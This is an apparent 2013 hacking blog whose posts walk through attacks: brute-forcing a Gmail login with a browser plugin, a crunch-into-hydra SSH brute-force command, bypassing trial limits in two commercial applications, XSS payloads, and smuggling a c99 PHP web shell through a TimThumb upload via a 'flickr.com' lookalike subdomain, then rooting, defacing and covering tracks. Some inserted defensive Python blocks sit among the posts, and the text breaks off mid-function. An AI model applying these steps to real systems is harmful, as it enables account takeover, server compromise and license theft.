Saturday, July 13, 2013

Look Ma' .... NO TOOLS :-)

Well, this will probably come off as weird by the time I explain the whole ordeal... see, recently I really wanted to publish about my best tools... but hey, I also wanted to publish a little about phone network hacking and thought, hmm, I will have to do a practical on that, so wait till my tools arrive... then the vicious cycle came back and I had to go back to the basics of... not having/using any tools, so... here we go...

No tools... well, this is impossible... why? Maybe because tools are everywhere: heck, your browser is a tool, your terminal is a tool, and, umm, yes, your BRAIN... this is a very handy tool. So here goes my no-tools list :)

Brain ---> very important, needs a lot of nourishment, including a little rest here and there (yes, it's not all work and no play)

Terminal ---> yes, this little creature awes many when they finally know who/how/where/when to use it

Browser ---> I have always insisted on using the browser as a tool, but why??? Well, maybe because it's called a browser... it's the one thing where we can actually see a graphical input/output of the data we feed it and of what comes back from it. Anywho...

Here is how all this works. Let's start from the point where we all want to do a pentest and we want to avoid tools, just for the sake of not wanting (or not having*) the tool. So we start with information gathering... using only the tools above...

Say we are attempting to get information about a website we want to pentest... the tools, only the above... here we go :)

PASSIVE INFORMATION GATHERING

Footprinting --- aimed at gathering intelligence about the infrastructure of a target network, only from information to which access is free and authorized. It is the first component of the information gathering step of a pentest, before port scanning and fingerprinting.

Here we can fire up our *nix terminal and get a head start by doing the following:
- DNS query: from a domain name you obtain the associated IP addresses; any record type in the DNS response is useful (A, MX, NS, TXT, etc.),
- reverse DNS query: from an IP address or an IP range you obtain hostnames.

Here we can also fire up our browser and do simple but informative things such as:
- WHOIS database: you obtain the registration information legally required for the domain name,
- search engine queries,
- X.509 certificate queries (the certificate names the organisation and often additional hostnames),
- analysis of the website's robots.txt (paths the owner does not want indexed),
- the page source (comments, paths, script includes).

and with some nifty tricks we can move on to:

Fingerprinting and port scanning
Well, real port scanning is very tricky with only the tools above, but default configurations will tell us a lot about this website, e.g.:

- Noting down the favicon --- a CMS or framework's default favicon tells us what is running
- Noting/generating errors on the website --- default error pages name the web server platform and the port it listens on, e.g. 80, 8080, 443
- Noting the protocols implemented --- a webmail login reveals an open port, https means 443, ftp:// links mean an FTP server, etc.
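As an added example (not code from the original post), here is what the fingerprinting steps above look like when scripted: one constructed HTTP response (a default Apache 404 page inside a WordPress theme; not a real capture) is parsed for the Server and X-Powered-By banners, the session cookie name, the generator meta tag, the favicon path and the virtual host and port that the default error page names. The hostnames, versions and paths in the sample are made up.

```python
"""Fingerprint a web server from one HTTP response: headers, cookies, default error page, CMS paths."""
import re
from html.parser import HTMLParser

# Constructed sample: a default Apache 404 page wrapped in a WordPress theme header. Not a real capture.
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Sat, 13 Jul 2013 10:00:00 GMT\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.10-1ubuntu3.6\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><head>\n"
    '<meta name="generator" content="WordPress 3.5.1" />\n'
    '<link rel="shortcut icon" href="/wp-content/themes/demo/favicon.ico" />\n'
    '<link rel="stylesheet" href="/wp-content/themes/demo/style.css" />\n'
    "</head><body>\n"
    "<h1>Not Found</h1>\n"
    "<p>The requested URL /nope was not found on this server.</p>\n"
    "<hr><address>Apache/2.2.22 (Ubuntu) Server at www.example.com Port 8080</address>\n"
    "</body></html>\n"
)

# Session cookie names and URL path conventions that identify a platform without any banner.
COOKIE_HINTS = {"PHPSESSID": "PHP", "ASP.NET_SessionId": "ASP.NET", "JSESSIONID": "Java servlet container"}
PATH_HINTS = {"/wp-content/": "WordPress", "/wp-includes/": "WordPress", "/sites/default/files/": "Drupal"}


class _HeadParser(HTMLParser):
    """Collect the generator meta tag, the favicon link and every referenced asset path."""

    def __init__(self):
        super().__init__()
        self.generator = None
        self.favicon = None
        self.paths = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "generator":
            self.generator = a.get("content")
        elif tag == "link" and a.get("href"):
            if "icon" in (a.get("rel") or "").lower():
                self.favicon = a["href"]
            self.paths.append(a["href"])
        elif tag == "script" and a.get("src"):
            self.paths.append(a["src"])


def fingerprint(raw_response):
    """Return what one response gives away: banner, language, session cookie, CMS, vhost and port."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    headers, cookies = {}, []
    for line in header_lines:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            cookies.append(value.split("=", 1)[0])
        else:
            headers[name] = value

    parser = _HeadParser()
    parser.feed(body)

    info = {
        "status": status_line,
        "server": headers.get("server"),
        "powered_by": headers.get("x-powered-by"),
        "cookies": cookies,
        "generator": parser.generator,
        "favicon": parser.favicon,
        "vhost": None,
        "port": None,
        "platform_hints": set(),
    }
    # A default Apache error page repeats the banner and names the virtual host and listening port.
    m = re.search(r"Server at (\S+) Port (\d+)", body)
    if m:
        info["vhost"], info["port"] = m.group(1), int(m.group(2))
    for cookie in cookies:
        if cookie in COOKIE_HINTS:
            info["platform_hints"].add(COOKIE_HINTS[cookie])
    for path in parser.paths:
        for prefix, platform in PATH_HINTS.items():
            if prefix in path:
                info["platform_hints"].add(platform)
    return info


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_RESPONSE).items():
        print("%-15s %s" % (key, value))
```

Feed it the raw bytes of any response you saved from the browser's network panel or from a terminal fetch; the point is that a single deliberately wrong request already names the platform, the language, the CMS and a non-standard port without a scanner ever touching the host.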

See, we are already getting information just by simple and yet effective tactics...

Well, I can't outline all the tricks on one page, but this should get you rolling; others will come off as such,
giving us lots of ways to go at the website with attacks/vulnerabilities known for the running services/platform/CMS.

With that, XSS, SQL injection, brute force (web forms), RFI/LFI and other techniques become more reliable and a little easier than before. I am not saying tools are not useful; I am saying working from a knowledgeable point of view is more relatable and easier.

have a good day won't you :)

Saturday, July 6, 2013

My FaceBook has Been Hacked - Retard Theory

Security is not always about breaking in; actually it's also about protecting, ensuring reliability, and more than just hacks.

When I do information security research I meet a vast number of people who range from a level of really no clue what security is... to a level of the impossible-security scenario. What am I talking about? Here is a small clue:

Can a Facebook account be hacked?

Ans 1: [Advanced Diploma in Computer Engineering graduate] No, it's a lie, it's impossible.

Ans 2: [Zero technical information, random person] Yes, actually last week my Facebook account was hacked.

Now, standing off from these two answers, here are my two cents... Yes, Facebook accounts can be hacked in numerous ways, and one of these ways I will show you in clear terms. NO, it's not impossible to hack Facebook accounts. But Facebook is very secure ----> Yes, FACEBOOK... not you... you are hardly secure... why? Because we are humans... and we love simplicity, and that's why we are hardly secure.

Passwords
Random question: how many different passwords do you have?
Let me guess, an average of 4:

  • your 4-digit password (PIN): ATM PIN, mobile code, mobile money transfer code (M-PESA)
  • your sign-in password (Gmail, Ymail, Yahoo, MSN, Twitter, Facebook, YouTube, Scribd)
  • your special password (this comes from sites that constrain password input, e.g. an iTunes account requires at least 1 uppercase letter, a number and 8 characters minimum in your password)
  • then you have your very-hard-to-crack password :)
Let's see: so if I have your sign-in password I basically have 70% of your passwords... on a small-scale factor. But how do I get it? Well, though some systems have tried very hard to avoid you being compromised, e.g. iTunes has its password rules under which W4njiru is a valid password, and Gmail has measures that restrict dictionary words such as telephone from being used, and also reversed words like drowssap for password, not many people set such rules for themselves...

It's hardly *hardcore* hacking when your password is reallyhotchick and your username is reallyhotchick@gmail.com. Yes, even reallyhotchick1990 is not a password. Why? Because that's your date of birth, silly, and yes, it's easy to remember. Here is the catch: wanna get really stubborn when creating your password? Think crazy... not your fav ANYTHING, heck, not even your secret. Think of a phrase, e.g.
bitchisawyoucreepingwithmyman, then manipulate it... how? Change everything that looks like a number to a number :) so it becomes b1tch1s4wy0ucr33p1ngw1thmym4n. Well, that's really hard (duh, that's the point), but ah ah, not yet: what about adding some more complexity, adding characters e.g. !*#^*@%$?
You can use them as spacing, e.g. b1tch!1s4w_y0u,cr33p1ngw1th*mym4n?

And that's a password :) but it's long and complex? EXACTLY. One caveat: the letter-to-digit swaps on their own add very little, because every password cracker applies exactly those substitutions as rules; what puts this phrase out of reach of a wordlist is its length and the fact that it is not a quote anyone else uses.

And for a PIN, 1992 is not a good thing if your daughter or you were born in 1992, and neither is 2991.

moving on :

LogOUT
Are you on a shared computer? (Shared even means your BFF ---- Yes... LOG THE FUCK OUT.)

Remember Password
Well, if it is my computer I can set it to remember my password... sure, why not, except there are tools that steal passwords on the go, e.g. an Android tool installed on an Android phone (yeah, OK) and connected to your computer via USB that downloads* all the available passwords: Firefox's saved passwords, Windows passwords, etc. Read about it here.

Well, to protect yourself from things like this:

  • Strong login password --- again --- (yes, for your computer)
  • Keyrings --- what are they :) google them; if not found or not helpful, ask in the comment box
  • Lock your computer when you leave, alright???
  • If possible, set permissions so that installing software requires a password
SSL
Say what???? You are in a cybercafe... again, and this time you brought your laptop :) no way they can hack me (well, maybe not through those machines)... you sip your juice comfortably, noticing everyone using the wi-fi (probably open), and hmmmm, what do you know, even the matatus (public vehicles) these days have the same tech-savvy ingenious wi-fi. Guess what... does your Facebook URL look like so:
http://facebook.com? Well then... you, my friend, are screwed: on an open network anyone nearby can read plain HTTP traffic, your session cookie included. Please go to your settings on Facebook and adjust them to use SSL, so that a simple URL change will look like https://facebook.com. HTTPS is the encrypted form of HTTP and is much safer... now browse away :)

Links
Ohhhhhh, Ray J's sex tape :) I wanna view
One proverb... curiosity killed the cat... you wanna die? Click away. Read more here.

So am I secure yet? Well, we are getting there, but hey, maybe the long password is easily forgotten. DON'T WRITE IT DOWN ANYWHERE... cram it; if you can't, there are keyrings that store passwords and you authenticate with questions or phrases, alright :) we will continue later
CIAO, don't get hacked

oww :)




GOOD DAY ... and Happy Info-Security

Friday, July 5, 2013

BruteForce Attack with WebBrowsers [GMAIL]



Today I will show you how to do a password test via your web browser.

Well, this is via Mozilla-based web browsers, e.g. Iceweasel (comes on Kali Linux) and Firefox (there are other variants --- don't use them though) and the OWASP Mantra browser.

So first you will need to grab some tools for your hack to be effective... here is my collection that I add in case I don't want the whole OWASP Mantra bundle (not that it's bad, but on FreeBSD it's a pain compiling Linux-enabled modules on it without a fight over 32- vs 64-bit architecture):

Pentest Tools for your Browser

Then add the tool (FireForce) and from here on we can work with that... note this is not only usable on Gmail; a lot of web login forms, such as WordPress, Joomla and cPanel, are susceptible to brute-force attacks...

So the first thing we do after installing from the collection is navigate to the desired page, being:
gmail.com >> note this is entirely for educational purposes and is done at your own peril
So after install and navigating we get this:

So we enter our email/victim [junio1234junio] (not a real account :P)

Then we enter a fake password to generate an error message that will be very helpful later.

Now we right-click on the password box to get the FireForce plugin/extension menu.

Here we get a chance to select the wordlist file, which we may have downloaded or created.

The next step is to add the error message we logged when we put in a wrong password.

And after that... we click save.

And there goes nothing... we attack/oops, test.

And done, password found :)





So what if I don't have a password/wordlist/dictionary file? Well, on many occasions one might not have one; that's where FireForce comes in with a good method to generate passwords during the test/attack using various character sets, e.g. a-z [lowercase], A-Z [uppercase], 0-9 [duuuh], mixed case aA-Zz and others... research for yourself :)

I have tested this in various web apps and it's not funny... it works... well, in most of them. Anyway, to combat this:

CAPTCHA ---- yes, it helps
Other verification methods, e.g. a text-message code: very HELPFUL
Lockout or progressive delays after a handful of failures: every guess a plugin like this makes is one full form submission, so this stops it cold
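As an added example, not code from FireForce or from the original post, the script below does in Python what the steps above do in the browser: submit each candidate to a login form and treat the first response that does not contain the logged failure message as a hit. It serves both this post and the password post further up: mangle() builds the candidates an attacker derives from a username and a birth year (which is why reallyhotchick1990 falls), and the mock form can be started with a lockout to show the countermeasure. The form, its field names and the target's credentials are constructed for the demo and run on localhost; nothing here touches Gmail.

```python
"""Credential guessing against a login form, the way a browser add-on does it, beside the lockout that defeats it."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def mangle(username, birth_year):
    """Guesses a cracker derives from the two things the target already published: name and year."""
    base = username.split("@")[0]
    year, yy = str(birth_year), str(birth_year)[-2:]
    leet = base.translate(str.maketrans("aeios", "43105"))
    guesses = [base, base + "1", base + "123", base + "!", base.capitalize(),
               base + yy, base + year, base.capitalize() + year, base + "@" + year, leet, leet + year]
    return list(dict.fromkeys(guesses))   # de-duplicate, keep order


# Constructed mock login form; field names and the target's credentials are invented for the demo.
VALID_USER, VALID_PASS = "reallyhotchick", "reallyhotchick1990"
FAILURE_STRING = "username or password you entered is incorrect"


class _LoginHandler(BaseHTTPRequestHandler):
    lockout_after = None    # None: no limit, i.e. the plugin-friendly form
    failures = 0

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        password = form.get("pass", [""])[0]
        cls = type(self)
        if cls.lockout_after is not None and cls.failures >= cls.lockout_after:
            code, body = 429, b"Too many failed attempts; verify by SMS to continue."
        elif (user, password) == (VALID_USER, VALID_PASS):
            code, body = 200, b"Welcome back."
        else:
            cls.failures += 1
            code, body = 200, ("The " + FAILURE_STRING + ".").encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_server(lockout_after=None):
    """Start the mock form on a free loopback port; returns (server, login_url)."""
    _LoginHandler.lockout_after = lockout_after
    _LoginHandler.failures = 0
    server = HTTPServer(("127.0.0.1", 0), _LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/login" % server.server_address[1]


def brute_force(login_url, username, candidates):
    """Submit each candidate; the first response without the logged failure string is the hit."""
    for password in candidates:
        data = urllib.parse.urlencode({"user": username, "pass": password}).encode()
        try:
            with urllib.request.urlopen(urllib.request.Request(login_url, data=data), timeout=5) as resp:
                page = resp.read().decode()
        except urllib.error.HTTPError as err:
            if err.code == 429:
                return None          # locked out: every further guess is wasted and logged
            raise
        if FAILURE_STRING not in page:
            return password
    return None


if __name__ == "__main__":
    server, url = start_server()
    print("found:", brute_force(url, VALID_USER, mangle("reallyhotchick@gmail.com", 1990)))
    server.shutdown()
```

The same loop with a real wordlist is exactly what the plugin automates; the second half of the test (start_server(lockout_after=3)) is the defence the post lists, and note that the attacker's code has to give up rather than keep guessing, because after the lockout even the right password is rejected.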

CIAO happy hunting :)


  

Thursday, July 4, 2013

SoftWare Analysis/Cracking/Testing its tricks and stupidity [part 2]

Well, continuing from part 1, where we had found a bypass for extending/resetting the RPOSS we were conducting an analysis on... so, though cracked software hardly needs to be 100% clean, its reset consisted of continuously rewriting a file, so I modified the file to be write-only and voila...
What do you know, it still works... What I am simply saying is... the software was not going to work as they expected, hence a security breach... (but we didn't hack it... ??? ) Did we...?

SIMS ---- owww dear, so we start with decompiling it... reading that when we overdated* it and backdated* it there was hardly a change... it means that it locks from inside itself rather than from outside (at the operating system level). OK, so the assessment starts... for me I always start with the easy things first (this is what all hackers would definitely go for... and even noobs will spot it)... and what is the easy thing? Decompilation? Well, maybe... in this case it's much easier, seeing that .NET Reflector decompiles the code to Visual C#, so it's not hard code as in the case of ASM... so here goes nothing.

After a small decompilation of the form that handles activation... something catches my eye, very quickly: we have a reference to the database in that form... why would we have that?? Moving in on the clue, I head to the database, which is MySQL, and check for a few notables. We have normal tables (db users, students, teachers, blah blah blah)... we have config tables, VOILA... configurations :) Well, in config (configurations) what do we have? We have something named module, active and dateof_activation, hmmmm, see a pattern here? We have module (this would be one of the modules that we installed from the SIMS, i.e. examination module, finance module, school record module, blah blah blah). Checking on each, I note all of them have the following information:

module      active      dateof_activation
module1     false       12/3/13   (OK, this is not the correct date format for MySQL... but it is a 10-day advance from the day I forwarded it)

This goes on for all the modules... so... I edit the data fields and change active to true... restart my application and voila!!! No error messages or warnings...

I would expose more if not for the lengthy subject, as I said, of embarrassing lazy developers... from this part of SQL injections on the application allowing me to add users via various form fields... in any case I go back to the teachers...

Is it possible for you (lecturers/teachers, consultants) to add some security information classes when teaching developers about all this? If not... our applications are as dangerous as letting a wolf lead sheep... not that it would be better if it were vice versa :)

CIAO happy hunting

Wednesday, July 3, 2013

Passwords ... Hydra and Crunch have a date with your network .... Sema chipo

A fellow hacker friend complained... yes Bright, you did :) about the use of John the Ripper as opposed to crunch when feeding Hydra for brute force, so without much ado here is his opinion in a practical way :)

You can pipe crunch directly into Hydra, but Hydra tests passwords much more slowly than it receives them. So you use xargs as a buffer and hand the candidates to Hydra one line at a time:

crunch 4 4 -f charset.lst mixalpha | xargs -I{} hydra -s 22 -vV -l root -t 10 -o /tmp/pass -p {} 127.0.0.1 ssh

xargs -I{} runs the command (here hydra) once for each line received (from crunch, here), substituting the line for {}. This can take some time, because each Hydra run handles a single candidate and cannot spread attempts across its parallel tasks (the -t 10 only matters when a run has several candidates), but by generating passwords on the fly you no longer have to store a huge wordlist or load it into memory.

SoftWare Analysis/Cracking/Testing its tricks and stupidity

Why so hush? Well, maybe because software developers don't have what it takes any more...
What do I mean? Is it that teachers and lecturers are failing would-be programmers and/or developers?
To me they already did that... here is my two cents' worth.

We have classes, labs, training and development facilities, well equipped, but what's the downfall? SECURITY (read: the practice). And why do I think/know so?

Recently I was offered a job to do a system analysis and pentest an application, black-box to be specific. Now it's not one application I will be comparing but two...

a SIMS (School Management Information System)
and
a RPOSS (Retail Point Of Sale System)

Now forget the acronyms; I will also forgo mentioning their names due to some laws and client privilege, but hey, here we go.

Under my job/pentest description my client(s) wanted to deploy the software as trials to other users, using the most common method, that is: the user tries out the product/service and the product expires after a certain period. Efficient? ... maybe.

So skipping on to the following... the SIMS would be usable for a standard 10 days then lock up completely, forbidding any user from interacting with it, while the RPOSS would be usable for a speculated 60 days then also lock up completely, forbidding access to the users totally...

Well, the terms highlighted in italics are as such: on the SIMS (standard) it actually had ten days from installation to be used (exactly 10 days), then it would act up... then on the RPOSS (speculated) it actually had 60 (actually 58) turns to be initialized (opened), then it would lock up.

{skipping the whole long conversation here is how i went at them}

  • The first thing to do is install them... (duuuh) > I normally make a backup of my registry (export) before any installation is done, and also do a regular process check to see what other/additional processes it/they will pull up.
  • The second thing is to check all the added files. For this I normally ensure I click "show full details" while installing, noting down any path being added or created that differs from the one I have set.
  • After install I usually export another copy of the registry from my computer so I can compare and assess all this as required.
  • Well >> we can't wait for 60 days or 10 days to actually see what happens, can we? Well, not in my case... any other analyst will probably fire up their expensive or complex tools and decompile the applications or library files or??? Anyway, a pal and fellow hacker, not to mention mentor (too much ass kissing...? you should... this guy is a god), Chucks, says every battle is won before it's fought... so no tools... for now. First things first: forward the date 61 days from then :) why 61, not 10 (go figure). So:
here is what I get:
SIMS --------------- [duration overdue please enter activation code or register with the software supplier]
(or something like that :) )
RPOSS ------------ {still opens !!!!! }

Hmmm, OK, so what happens on a backdate?
So I backdate the date and start checking again... response?

SIMS --------------- [duration overdue please enter activation code or register with the software supplier]
(or something like that :) )
RPOSS ------------ {still opens !!!!! }

OK, I think I am missing something... but hey, it's too early to tell... why not check my registry exports? Here goes nothing (well, actually "nothing" is true, because I find nothing). There are tonnes of registry editors that allow automatic or manual comparison... I prefer manual... if you wanna learn about how the registry works (google it); meanwhile post a comment and I will see what I can do. OK... moving on.

What about we check the activation method...
  1. can we bypass it?
  2. is it valid?
  3. what is its method?
I fire up my IDA Pro and decompile this little bugger (well, the RPOSS).
For the SIMS, it has a lot of .NET requirements when installing, so basically .NET Reflector works much better while I am handling it. What does the RPOSS give us? (For confidentiality reasons I am not allowed to print the screenshot of the code, but here's a fast forward.) The method that handles the counter happens to save to a file!!!!! What???? What do you mean, an encrypted file? Well, actually no, a *.cfg file. Wow, OK, HOW LAZY. So what happens here... well, let's open up the file... a simple drag to gedit or kwrite (on Windows, Notepad) gives us an open file with the number 12 in it... OK... so what if I change it to 0... still opens... and to 70, or any number higher than 60? We get a warning/error [please register ***** as it was distributed without a license key], or something like that :)

Amazing... so what? For one, we found a flaw, and I could go on about the numerous other issues in how the software/application was vulnerable, but let me spare the developers the embarrassment...

What methods could have solved this programmer/developer issue? And why did I attack the teachers/lecturers?
Well, a lot of things... check that in part two, where we crack* the second system, the SIMS.
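The counter in a plaintext .cfg (the RPOSS, above) and the active flag in a config table (the SIMS, in part two further up the page) fail the same way: the application believes whatever it reads back. As an added example, not code from either product or from the author, here is a plaintext counter beside a keyed-MAC version that also fails closed when the file cannot be written (the RPOSS kept running when its file was made unwritable). The key, the file layout and the limits are invented for the demo.

```python
"""Trial state a text editor can reset, beside a keyed-MAC version that fails closed."""
import hashlib
import hmac
import json
import os
import tempfile


def plain_read(path):
    """The RPOSS way: an integer in a .cfg file. Whatever is in the file is believed."""
    with open(path) as f:
        return int(f.read().strip() or 0)


def plain_write(path, launches):
    with open(path, "w") as f:
        f.write(str(launches))


def signed_write(path, state, key):
    """Persist the state as JSON followed by an HMAC-SHA256 over that JSON."""
    body = json.dumps(state, sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    with open(path, "w") as f:
        f.write(body + "\n" + tag)


def signed_read(path, key):
    """Verify before trusting: an edited counter carrying the old tag is rejected."""
    with open(path) as f:
        body, _, tag = f.read().rpartition("\n")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("trial state has been tampered with")
    return json.loads(body)


def launch(path, key, limit):
    """One application start: load, verify, count, persist. Refuses to run if it cannot record the start."""
    try:
        state = signed_read(path, key)
    except FileNotFoundError:
        state = {"launches": 0}          # first run: no state yet
    if state["launches"] >= limit:
        return False
    state["launches"] += 1
    try:
        signed_write(path, state, key)
    except OSError:
        return False                     # unwritable state file: fail closed, unlike the RPOSS
    return True


def tamper(path, launches):
    """What the text editor did to the .cfg: rewrite the counter and leave the rest alone."""
    with open(path) as f:
        _, _, tag = f.read().rpartition("\n")
    with open(path, "w") as f:
        f.write(json.dumps({"launches": launches}) + "\n" + tag)


def fresh_path():
    """A state file path in a new temporary directory (demo helper)."""
    return os.path.join(tempfile.mkdtemp(), "trial.cfg")


def unwritable_path():
    """A path whose directory does not exist, so every write fails (demo helper)."""
    return os.path.join(tempfile.mkdtemp(), "no-such-dir", "trial.cfg")


if __name__ == "__main__":
    key, path = b"demo-key-baked-into-the-binary", fresh_path()
    print([launch(path, key, 3) for _ in range(4)])    # three starts allowed, the fourth refused
    tamper(path, 0)
    try:
        signed_read(path, key)
    except ValueError as err:
        print("after editing the counter:", err)
```

The caveat is the one the posts themselves demonstrate: the key sits in the binary, so anyone who decompiles it (as above with IDA Pro and .NET Reflector) can re-sign any counter they like. A MAC only defeats the text-editor edit; a trial that must survive a determined user has to be enforced by an activation server, not by state the client holds.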

later CIAO

Tuesday, July 2, 2013

Browser as an Attack/Pentest Tool



Tools to add to your browser (Firefox/Mozilla-based browsers)

Chrome I love, but Firefox, to me, tools up better (whatever that means).

These are add-ons found in the security framework/browser OWASP Mantra and come in handy when doing recon/pentest/attack/vuln assessment.

I add them to my Firefox/Iceweasel (Kali) for more reinforcement (automation is not necessarily my thing, but it gets the work done :)

CIAO, have fun

Oh, here is the link to the collection: <Collections> :)

I do not wish to deter you from OWASP Mantra... no, no... I just love the ease I have with this method, especially on FreeBSD. So if you wanna try OWASP Mantra... :) have a go at it: OWASP Mantra

XSS -slaying information from simple actions like----- a MOUSE HOVER :)

XSS, well :) what do we know about it?

Cross-Site Scripting, as it's called :) is a web vulnerability in which content an attacker controls is delivered to other users' browsers and runs there as script or active markup (JavaScript, HTML event handlers, HTML5 features, etc.).

Some examples of exploitation include:
  • injecting a fake login form;
  • retrieving legitimate users' cookies;
  • injecting browser exploits;
  • getting users to perform an arbitrary action in the web application;
...
and tonnes more...

A simple XSS would look like <script>alert(1);</script> when injected into an HTML form; in a URL it may look like this:
http://urvulnerablewebsite-app.domain/xss/example.php?name=<script>alert(1);</script>

So what really happens? XSS comes from a lack of output encoding when user-supplied data is sent back to the application's users. Unlike most other attacks it targets the client (the browser) rather than the server.

How dangerous is this? Well... here is a simple calculation...
XSS in URL-encoded form is hardly noticeable to any viewer (it looks like a normal URL):

http://urvulnerablewebsite-app.domain/xss/example.php?name=kardashian_sex_tape%3Cp%20onmouseover=alert%28%27XSS%27%29%3Eer%3C/p%3E

The above link (leave the sex tape out of this), unlike the first one, has no <script> tag at all: it is a URL-encoded <p> element with an onmouseover handler, so it loads on the page without any immediate effect until you hover your mouse over the injected text :) !!! And what's the worst that can happen? Owwww, I don't know, maybe... fake login page injection (social sites, online banking), retrieving legitimate users' cookies from your browser :)... getting you to perform arbitrary actions on the web app without your consent (well, your knowing consent).
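As an added example, not code from the original post, here is the reflection that the example.php in the URLs above performs, beside the same page with output encoding, and a small checker that reports whether the rendered HTML contains an inline event handler or script tag. The page template is invented; the URLs are the ones quoted above (the script payload is written without the trailing semicolon so the query parser never sees a separator).

```python
"""Reflected XSS: the parameter echoed verbatim, beside the same page with output encoding."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The hover payload from the post, URL-encoded exactly as it travels in the link.
XSS_URL = ("http://urvulnerablewebsite-app.domain/xss/example.php"
           "?name=kardashian_sex_tape%3Cp%20onmouseover=alert%28%27XSS%27%29%3Eer%3C/p%3E")
SCRIPT_URL = "http://urvulnerablewebsite-app.domain/xss/example.php?name=%3Cscript%3Ealert%281%29%3C/script%3E"
BENIGN_URL = "http://urvulnerablewebsite-app.domain/xss/example.php?name=Mary"

TEMPLATE = "<html><body><h1>Hello %s</h1></body></html>"   # invented page body


def _name_param(url):
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def vulnerable_page(url):
    """What a reflecting example.php does: the decoded parameter goes straight into the HTML."""
    return TEMPLATE % _name_param(url)


def fixed_page(url):
    """Same page, with the value encoded for an HTML text context before it is emitted."""
    return TEMPLATE % html.escape(_name_param(url), quote=True)


class _ActiveContentFinder(HTMLParser):
    """Record every tag that carries an on* attribute, and every script tag."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.append(("script", "<inline>"))
        for attr, _ in attrs:
            if attr.lower().startswith("on"):
                self.found.append((tag, attr.lower()))


def event_handlers(page):
    """(tag, attribute) pairs in the rendered page that would execute in a browser."""
    finder = _ActiveContentFinder()
    finder.feed(page)
    return finder.found


if __name__ == "__main__":
    for url in (XSS_URL, SCRIPT_URL, BENIGN_URL):
        print("vulnerable:", event_handlers(vulnerable_page(url)), " fixed:", event_handlers(fixed_page(url)))
```

html.escape is the right encoder only because the value lands in HTML text; a value placed inside an attribute value, a script block or a URL needs the encoder for that context, and no amount of input filtering replaces encoding at the point of output.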

More about this attack can be found in the OWASP XSS cheat sheet, including filter evasion and, even more useful, how to protect yourself... PEACE... I'm out.

Saturday, June 22, 2013

Venni, Viddi ,Vicci ....I hacked :P



Pentesting/hacking web apps

Find a Vulnerable Website –> Upload a c100/99 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks




ok so will do that ... but since this will be done on my pentest lab i wont be so thorough with the proxy/anonymity but in the video i will cover the basic to the upload shell




So we first find the vulnerable website/app

(duuh)

We run the web scanner to look for vulnerabilities (arachni web scanner, acunetix, w3af, vega ,also sqlmap works quite ok if you know what your doing p.s so the others)




My scan finds an insecure upload form... :)

OK. Now we have the site and the path where the vulnerability is. In our example let's say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs (and the ViArt web app) that have installed certain plugins or themes and haven't updated to the latest version of TimThumb, an image-resizing script used on websites.

Till now, we know:

- The website's blog has a serious vulnerability in TimThumb.
- It is hosted on a Unix system.

Next, because the vulnerability is in an outdated TimThumb version, and TimThumb fetches and resizes images, we upload the shell instead of an image.

Thus, download any image (I would recommend a small one) from Google Images. We don't care what it shows.

Generate output with iCon2PHP

Copy your image and your shell to the folder where iCon2PHP is located.

Run the program and follow the in-program instructions to build 'finalImage.php'.

To avoid any errors while uploading, rename 'finalImage.php' to 'image.php;.png' (instead of png, use the format your image was: jpeg, jpg, gif...). This is exactly the same file, but the name confuses the uploader's extension check into treating it as an image.



iCon2PHP Terminal Output:

[...]

Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php

Entered!

Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your 'image.php;.png' to a free host (000webhost, 0fees, etc.).

Go to the vulnerable script and request:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It is better to create a subdomain named like "flickr.com" (or another big image-hosting service) because the vulnerable versions only accept remote images whose URL matches an allow-listed host, and they match it loosely: a hostname that merely contains "flickr.com" passes.
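As an added example, not TimThumb's code and not from the original post, the checks below show why the subdomain and filename tricks above work: a loose host match accepts any URL that contains an allowed site name, and an "ends with .png" rule accepts image.php;.png. Beside each is a strict version, plus a content sniff and a server-chosen cache name. The allow-list and the sample bytes are constructed; the hardened checks are one reasonable design, not the fix the TimThumb project shipped.

```python
"""Remote image fetch: loose allow-list and extension checks beside strict ones, plus content sniffing."""
import hashlib
import posixpath
import re
from urllib.parse import urlsplit

ALLOWED_SITES = ("flickr.com", "blogger.com", "wordpress.com")   # illustrative allow-list
IMAGE_TYPES = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def loose_host_ok(src):
    """A substring match on the whole URL: flickr.com.domain.0fees.net contains 'flickr.com'."""
    return any(site in src.lower() for site in ALLOWED_SITES)


def strict_host_ok(src):
    """Parse first, then compare the host itself: equal to, or a subdomain of, an allowed site."""
    parts = urlsplit(src)
    host = (parts.hostname or "").lower()
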